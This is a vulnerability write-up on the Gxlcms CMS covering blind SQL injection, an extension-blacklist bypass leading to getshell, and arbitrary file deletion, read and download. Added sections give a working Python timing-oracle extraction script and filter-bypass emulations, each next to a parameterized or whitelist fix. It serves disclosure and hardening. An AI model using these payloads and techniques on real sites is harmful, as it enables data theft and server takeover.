Gxlcms: front-end time-based blind SQL injection, plus arbitrary file delete / read / download and getshell in the admin backend

Source: Internet
Author: User

Front-end SQL time-based blind injection

In the front-end work-rating feature.

Lib\home\action\commaction.class.php

Line 56:

        $ting_id = $_GET["id"];

Line 133:

            $ting_gold = $mod->where("ting_id='$ting_id'")->getfield("ting_gold");

The id goes into the WHERE clause unescaped. The page does not echo the query result in any usable way, so this has to be exploited as a time-based blind injection.
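The following is an added example, not Gxlcms code, showing the two halves of the problem: the interpolation bug in getfield() and the timing oracle an attacker builds on top of it. SQLite stands in for MySQL, with a SLEEP() user function registered so the injected payload has the same timing side channel it would have against MySQL (where the payload shape would be `1' AND IF(cond, SLEEP(5), 0) AND '1'='1`). The tables, the `admin` target and its contents are constructed for the demo; only `ting_id` / `ting_gold` come from the page.

```python
import sqlite3
import time

# Added example, not Gxlcms code. SQLite stands in for the MySQL backend; SLEEP()
# is registered as a user function so the injected payload keeps its timing side
# channel. The 'admin' table and its contents are constructed for the demo.
SLEEP_SECONDS = 0.1


def make_db():
    conn = sqlite3.connect(":memory:")
    # MySQL's SLEEP(n) pauses and returns 0; emulate it so the payload below works here.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.executescript("""
        CREATE TABLE ting (ting_id INTEGER, ting_gold INTEGER);
        INSERT INTO ting VALUES (1, 100), (2, 250);
        CREATE TABLE admin (username TEXT, password TEXT);   -- constructed target
        INSERT INTO admin VALUES ('admin', 'pw42');
    """)
    return conn


def vulnerable_getfield(conn, ting_id):
    """Mirrors $mod->where("ting_id='$ting_id'")->getfield("ting_gold"): raw interpolation."""
    sql = "SELECT ting_gold FROM ting WHERE ting_id='%s'" % ting_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_getfield(conn, ting_id):
    """Hardened form: a bound parameter never becomes part of the SQL text."""
    row = conn.execute("SELECT ting_gold FROM ting WHERE ting_id=?", (ting_id,)).fetchone()
    return row[0] if row else None


def timing_oracle(conn, condition):
    """True/False for an arbitrary SQL condition, judged only by response time.
    The returned field is deliberately ignored: the page gives no usable echo."""
    payload = "1' AND (CASE WHEN %s THEN SLEEP(%s) ELSE 0 END) AND '1'='1" % (
        condition, SLEEP_SECONDS)
    start = time.monotonic()
    vulnerable_getfield(conn, payload)
    return time.monotonic() - start >= SLEEP_SECONDS / 2


def _bsearch(conn, expr, lo, hi):
    """Find the integer value of expr in [lo, hi] with about log2(hi - lo) oracle calls."""
    while lo < hi:
        mid = (lo + hi) // 2
        if timing_oracle(conn, "%s > %d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(conn, subquery, max_len=32):
    """Read a scalar string out of the database one character at a time: length first,
    then each character by binary search over its code point (unicode() in SQLite,
    ASCII()/ORD() in MySQL)."""
    length = _bsearch(conn, "length((%s))" % subquery, 0, max_len)
    return "".join(
        chr(_bsearch(conn, "unicode(substr((%s),%d,1))" % (subquery, i), 0, 127))
        for i in range(1, length + 1)
    )


if __name__ == "__main__":
    db = make_db()
    print(blind_extract(db, "SELECT password FROM admin"))   # recovered purely from timing
```

Each probe costs one request, and a true branch costs one SLEEP; the binary search keeps the total at roughly seven requests per character. The parameterized form in safe_getfield() treats the whole payload as a literal id and simply finds no row.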

Admin backend getshell

Attachment settings in the admin backend.

Fuzzing shows that the substring php is deleted from whatever extension list is submitted. Because str_replace makes a single left-to-right pass, a value such as pphphp comes out as php after submission (deleting the inner php leaves the outer p and hp).

Tracing into \lib\admin\action\adminaction.class.php:

$config["Upload_class"] = trim(str_replace(array(…), '', strtolower($config["Upload_class"])), ',');   // blacklist array elided in the original

Intercept the request with a proxy, trace it, and the same operation turns up a second time:

$upload_class = str_replace(array(…), '', strtolower(C("Upload_class")));   var_dump(strtolower(C("Upload_class")));

So the value is filtered twice: once when the attachment settings are saved and written into config.php, and again every time config.php is read back. Whatever is submitted must therefore survive two rounds of deletion and only then turn into the php suffix.

I'm using ptxtptxthtxtptxthtxtp here.

After the first replacement: pphphp

After the second replacement: php
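Added example, not Gxlcms code: an emulation of the two-pass filter described above, showing why stripping forbidden substrings is not an extension policy, next to a whitelist check that is. The blacklist contents are an assumption: the page only shows that "php" and "txt" are removed and that "php" is searched before "txt" (otherwise the first pass would already produce php and the second pass would delete it); the allowed set in the fix is likewise assumed.

```python
# Added example, not Gxlcms code. Emulates PHP's str_replace(array(...), '', strtolower($v))
# applied once on save and once on load. BLACKLIST and ALLOWED are assumptions for the demo.
BLACKLIST = ["php", "txt"]                      # assumed order: php searched before txt
ALLOWED = {"jpg", "jpeg", "png", "gif", "zip"}  # assumed whitelist used by the fix


def php_str_replace(value, search_terms):
    """PHP str_replace(array, '', $value): each term is removed in turn, one left-to-right pass each."""
    for term in search_terms:
        value = value.replace(term, "")
    return value


def gxlcms_style_filter(upload_class):
    """One pass of the filter as the page describes it: lowercase, strip blacklist, trim commas."""
    return php_str_replace(upload_class.lower(), BLACKLIST).strip(",")


def after_save_and_reload(upload_class):
    """Pass 1 when the settings are written to config.php, pass 2 when config.php is read back."""
    return gxlcms_style_filter(gxlcms_style_filter(upload_class))


def strip_until_stable(upload_class):
    """If a blacklist must be kept, iterate to a fixed point so no later pass can change the value."""
    while True:
        stripped = gxlcms_style_filter(upload_class)
        if stripped == upload_class:
            return stripped
        upload_class = stripped


def safe_upload_class(upload_class):
    """Whitelist each extension instead of deleting substrings; reject anything unknown outright."""
    exts = [e.strip().lower() for e in upload_class.split(",") if e.strip()]
    bad = [e for e in exts if e not in ALLOWED]
    if bad:
        raise ValueError("extensions not permitted: %r" % bad)
    return ",".join(exts)


if __name__ == "__main__":
    print(gxlcms_style_filter("ptxtptxthtxtptxthtxtp"))   # what lands in config.php
    print(after_save_and_reload("ptxtptxthtxtptxthtxtp"))  # what the upload code sees
```

The fixed-point loop turns the page's payload into an empty string instead of php, but the whitelist is the real fix: it never has to reason about what a deletion leaves behind.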

Arbitrary file deletion in the admin backend

Found in template-file management and in database restore.

    public function del() {
        $id = admin_gxl_url_repalce(str_replace('*', '.', trim($_GET['id'])));
        //die($id);
        if (!substr(sprintf("%o", fileperms($id)), -3)) {
            $this->error('No delete permission!');
        }
        @unlink($id);
        if (!empty($_SESSION['template_jumpurl'])) {
            $this->assign("jumpurl", $_SESSION['template_jumpurl']);
        } else {
            $this->assign("jumpurl", '?s=admin/template/show');
        }
        $this->success('Delete file succeeded!');
    }

The id is not filtered (the only check is that fileperms() returns something), so any file the web server can write to can be deleted.

Arbitrary file download

GET /index.php?s=admin-data-down-id-20170805_2978_1.sql HTTP/1.1

    public function down() {
        $filepath = DATA_PATH . '_bak/' . $_GET['id'];
        //die($filepath);
        if (file_exists($filepath)) {
            $filename = $filename ? $filename : basename($filepath);
            $filetype = trim(substr(strrchr($filename, '.'), 1));
            $filesize = filesize($filepath);
            header('Cache-Control: max-age=31536000');
            header('Expires: ' . gmdate('D, d M Y H:i:s', time() + 31536000) . ' GMT');
            header('Content-Encoding: none');
            header('Content-Length: ' . $filesize);
            header('Content-Disposition: attachment; filename=' . $filename);
            header('Content-Type: ' . $filetype);
            readfile($filepath);
            exit;
        } else {
            $this->error('Error, no sub-volume file found!');
        }
    }

Again nothing is filtered: an id built from ..\..\ (or ../) sequences walks out of the _bak directory, and file_exists() is the only gate.

Arbitrary file read

In the admin backend, intercept the request that adds an ad slot:

    // post-insert hook
    public function _after_insert() {
        $array = $_POST;
        var_dump($array);
        //die('./' . C('admin_ads_file') . '/' . $array['ads_name'] . '.js');
        write_file('./' . C('admin_ads_file') . '/' . $array['ads_name'] . '.js',
                   t2js(stripslashes(trim($array['ads_content']))));
        $this->success('Add ad slot success!');
    }

ads_name is not filtered, so a .js file with an attacker-chosen name is written under the template\gxlcms directory.

Template management also has an edit entry point:

    public function add() {
        $filename = admin_gxl_url_repalce(str_replace('*', '.', trim($_GET['id'])));
        if (empty($filename)) {
            $this->error('Template name cannot be empty!');
        }
        $content = read_file($filename);
        $this->assign('filename', $filename);
        $this->assign('content', htmlspecialchars($content));
        // (rest of the method not shown in the original)

Directory traversal here reads any file, but unfortunately the save side is hard-coded: only files on a whitelist can be modified, so this cannot be turned into a getshell.

I tried generating tt/2.js through the ad slot and then accessing tt, but directory traversal does not work there.

Arbitrary file download

Same cause as above: nothing is filtered.
